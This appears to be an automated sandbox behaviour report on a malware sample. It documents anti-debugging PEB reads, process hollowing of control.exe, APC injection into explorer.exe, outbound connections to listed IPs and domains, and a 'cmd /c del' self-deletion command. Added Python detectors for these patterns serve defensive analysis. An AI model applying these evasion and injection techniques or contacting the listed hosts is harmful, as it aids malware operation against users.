          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0458AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0457DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04648B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0459DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04645BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045AB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04581B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04581B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0462D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_0463138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_045A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\mal.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\mal.exeMemory allocated: page read and write | page guard
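          The repeated `mov eax, dword ptr fs:[00000030h]` / `mov ecx, dword ptr fs:[00000030h]` instructions listed above for control.exe load the PEB pointer from the 32-bit TEB (fs:[0x30]); code that does this in bulk is usually about to read PEB.BeingDebugged (PEB+0x2) or NtGlobalFlag, which is why the sandbox files them under anti-debugging. The Python below is an added example, not part of this report or of any vendor tool: a static scanner that finds those exact encodings in a raw code buffer and decodes the destination register, so the `mov eax` / `mov ecx` split in the evidence can be reproduced from a memory dump. The sample bytes are constructed, and the scanner also recognises the 64-bit `gs:[0x60]` form, which this 32-bit (SysWOW64) sample does not use.

```python
from __future__ import annotations
import re
from collections import Counter
from dataclasses import dataclass

# Constructed code buffer (not bytes from mal.pif): two of the 32-bit PEB
# reads the report lists, one 64-bit form for comparison, padded with filler.
SAMPLE_CODE = bytes.fromhex(
    "5589e5"              # push ebp / mov ebp, esp          (filler prologue)
    "64a130000000"        # mov eax, dword ptr fs:[30h]      (TEB -> PEB pointer)
    "8a4002"              # mov al, byte ptr [eax+2]         (PEB.BeingDebugged)
    "90909090"            # nops
    "648b0d30000000"      # mov ecx, dword ptr fs:[30h]      (ModR/M form, ECX)
    "90"
    "65488b042560000000"  # mov rax, qword ptr gs:[60h]      (x64 equivalent)
    "c3"                  # ret
)

# Destination register is the reg field (bits 5..3) of the ModR/M byte.
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]

# 32-bit: FS override 0x64, then either the EAX-only moffs32 form (A1) or
# 8B /r with mod=00 rm=101, i.e. an absolute disp32 of 0x30.
PAT32_SHORT = re.compile(rb"\x64\xA1\x30\x00\x00\x00")
PAT32_MODRM = re.compile(rb"\x64\x8B([\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00")
# 64-bit: GS override 0x65, REX.W 0x48, 8B /r with a SIB byte (rm=100, SIB=0x25)
# selecting an absolute disp32 of 0x60, the PEB pointer's offset in the 64-bit TEB.
PAT64 = re.compile(rb"\x65\x48\x8B([\x04\x0C\x14\x1C\x24\x2C\x34\x3C])\x25\x60\x00\x00\x00")


@dataclass(frozen=True)
class PebRead:
    offset: int       # offset of the instruction in the buffer
    bits: int         # 32 or 64
    register: str     # destination register
    encoding: str     # raw instruction bytes, hex


def find_peb_reads(code: bytes) -> list[PebRead]:
    """Return every PEB-pointer load in `code`, in address order."""
    hits: list[PebRead] = []
    for m in PAT32_SHORT.finditer(code):
        hits.append(PebRead(m.start(), 32, "eax", m.group(0).hex()))
    for m in PAT32_MODRM.finditer(code):
        reg = REG32[(m.group(1)[0] >> 3) & 7]
        hits.append(PebRead(m.start(), 32, reg, m.group(0).hex()))
    for m in PAT64.finditer(code):
        reg = REG64[(m.group(1)[0] >> 3) & 7]
        hits.append(PebRead(m.start(), 64, reg, m.group(0).hex()))
    return sorted(hits, key=lambda h: h.offset)


def count_by_register(hits: list[PebRead]) -> dict[str, int]:
    """Tally hits per destination register, like the report's mov eax / mov ecx split."""
    return dict(Counter(h.register for h in hits))


if __name__ == "__main__":
    for h in find_peb_reads(SAMPLE_CODE):
        print(f"{h.offset:#06x}  {h.bits}-bit  {h.encoding:<20} -> {h.register}")
```

          Legitimate code reads fs:[0x30] too (ntdll, the CRT start-up, TLS helpers), so a single hit proves nothing; the signal in this report is the density of reads clustered in one private region of control.exe (0x0457xxxx to 0x0464xxxx) rather than in a system DLL. Run the scanner over a dumped region and then look at what follows each hit: a `[eax+2]` byte read is BeingDebugged, a `[eax+68h]` dword read is NtGlobalFlag on 32-bit.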

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exeNetwork Connect: 209.99.64.55 80
          Source: C:\Windows\explorer.exeDomain query: www.mybabytennis.com
          Source: C:\Windows\explorer.exeDomain query: www.sarahcarver.com
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\mal.exeMemory written: C:\Users\user\Desktop\mal.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\mal.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\mal.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\mal.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\mal.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\mal.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\mal.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 110000
          Source: C:\Users\user\Desktop\mal.exeProcess created: C:\Users\user\Desktop\mal.exe C:\Users\user\Desktop\mal.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mal.exe'
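          Read together, the evasion evidence above is one chain: a child (control.exe) is created and its original image unmapped at base 0x110000, a PE (bytes starting 4D5A) is written at 0x400000, the main thread's context is rewritten and the process resumed; separately, code is mapped into explorer.exe and an APC queued there, after which explorer.exe, not mal.exe, does the network I/O and control.exe deletes the dropper with `cmd /c del`. The Python below is an added example, not part of this report or of any vendor product, showing how a detection engine would correlate such an API trace per (source, target) pair instead of alerting on individual calls. The trace is constructed: the ordering, the explorer.exe write address and the svchost.exe control event are invented, while 0x110000, 0x400000, the MZ prefix and 52.58.78.16:80 are taken from the evidence above. Real telemetry would key on PIDs rather than image names.

```python
from __future__ import annotations
from collections import defaultdict
from dataclasses import dataclass

CREATE_SUSPENDED = 0x00000004        # CreateProcess dwCreationFlags bit
PAGE_EXECUTE_READWRITE = 0x40        # the "execute and read and write" protection in the report

# Processes that should never receive code from another process and then connect out.
SYSTEM_HOSTS = {"explorer.exe", "control.exe", "svchost.exe"}

# Constructed API trace modelled on the evidence lines above (see lead-in for
# which values are from the report and which are invented).
TRACE = [
    {"src": "mal.exe", "api": "CreateProcessW", "target": "control.exe", "flags": CREATE_SUSPENDED},
    {"src": "mal.exe", "api": "NtUnmapViewOfSection", "target": "control.exe", "base": 0x110000},
    {"src": "mal.exe", "api": "VirtualAllocEx", "target": "control.exe", "base": 0x400000,
     "protect": PAGE_EXECUTE_READWRITE},
    {"src": "mal.exe", "api": "WriteProcessMemory", "target": "control.exe", "base": 0x400000,
     "data": b"MZ\x90\x00\x03\x00"},
    {"src": "mal.exe", "api": "SetThreadContext", "target": "control.exe"},
    {"src": "mal.exe", "api": "ResumeThread", "target": "control.exe"},
    {"src": "mal.exe", "api": "WriteProcessMemory", "target": "explorer.exe", "base": 0x02A00000,
     "data": b"\x55\x8b\xec"},
    {"src": "mal.exe", "api": "QueueUserAPC", "target": "explorer.exe"},
    {"src": "explorer.exe", "api": "connect", "target": "52.58.78.16:80"},
    {"src": "svchost.exe", "api": "connect", "target": "10.0.0.5:443"},   # benign control: never written to
]


@dataclass
class PairState:
    """What one source process has done to one target process so far."""
    suspended: bool = False
    unmapped: bool = False
    rwx_alloc: bool = False
    pe_written: bool = False
    code_written: bool = False
    context_set: bool = False


def analyze(trace: list[dict]) -> list[dict]:
    """Walk the trace once and emit an alert per matched injection pattern."""
    states: dict[tuple[str, str], PairState] = defaultdict(PairState)
    injected: set[str] = set()      # targets that received memory writes from another process
    alerts: list[dict] = []

    def alert(rule: str, src: str, tgt: str, detail: str) -> None:
        alerts.append({"rule": rule, "src": src, "target": tgt, "detail": detail})

    for ev in trace:
        src, tgt, api = ev["src"], ev["target"], ev["api"]
        st = states[(src, tgt)]
        if api == "CreateProcessW":
            st.suspended = bool(ev.get("flags", 0) & CREATE_SUSPENDED)
        elif api == "NtUnmapViewOfSection":
            st.unmapped = True                           # hollowing: original image removed
        elif api == "VirtualAllocEx" and ev.get("protect") == PAGE_EXECUTE_READWRITE:
            st.rwx_alloc = True
            alert("rwx_remote_alloc", src, tgt, f"RWX region allocated at {ev['base']:#x}")
        elif api == "WriteProcessMemory":
            st.code_written = True
            injected.add(tgt)
            if ev["data"][:2] == b"MZ":                  # 4D 5A: a PE header lands in the target
                st.pe_written = True
                alert("pe_write", src, tgt, f"PE image written at {ev['base']:#x}")
        elif api == "SetThreadContext":
            st.context_set = True                        # entry point redirected into the new image
        elif api == "QueueUserAPC" and st.code_written:
            alert("apc_injection", src, tgt, "APC queued into a process this source had written to")
        elif api == "ResumeThread":
            if st.suspended and st.unmapped and st.pe_written and st.context_set:
                alert("hollowing", src, tgt,
                      "suspended child, image unmapped, PE written, thread context rewritten, then resumed")
        elif api == "connect" and src in injected and src in SYSTEM_HOSTS:
            alert("injected_system_process_network", src, tgt,
                  "system process connected out after receiving injected code")
    return alerts


if __name__ == "__main__":
    for a in analyze(TRACE):
        print(f"{a['rule']:<32} {a['src']} -> {a['target']}: {a['detail']}")
```

          The hollowing rule fires only on ResumeThread once all four preceding steps have been seen for the same pair, so a benign parent that merely starts a suspended child and resumes it produces nothing; the network rule is what turns "explorer.exe talks to 52.58.78.16:80" from noise into the "system process connects to network" finding above, because it conditions on the earlier cross-process write.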
          Source: explorer.exe, 00000003.00000000.254840052.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000000.255111932.0000000001980000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.267754252.0000000006860000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.255111932.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.255111932.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Users\user\Desktop\mal.exe VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
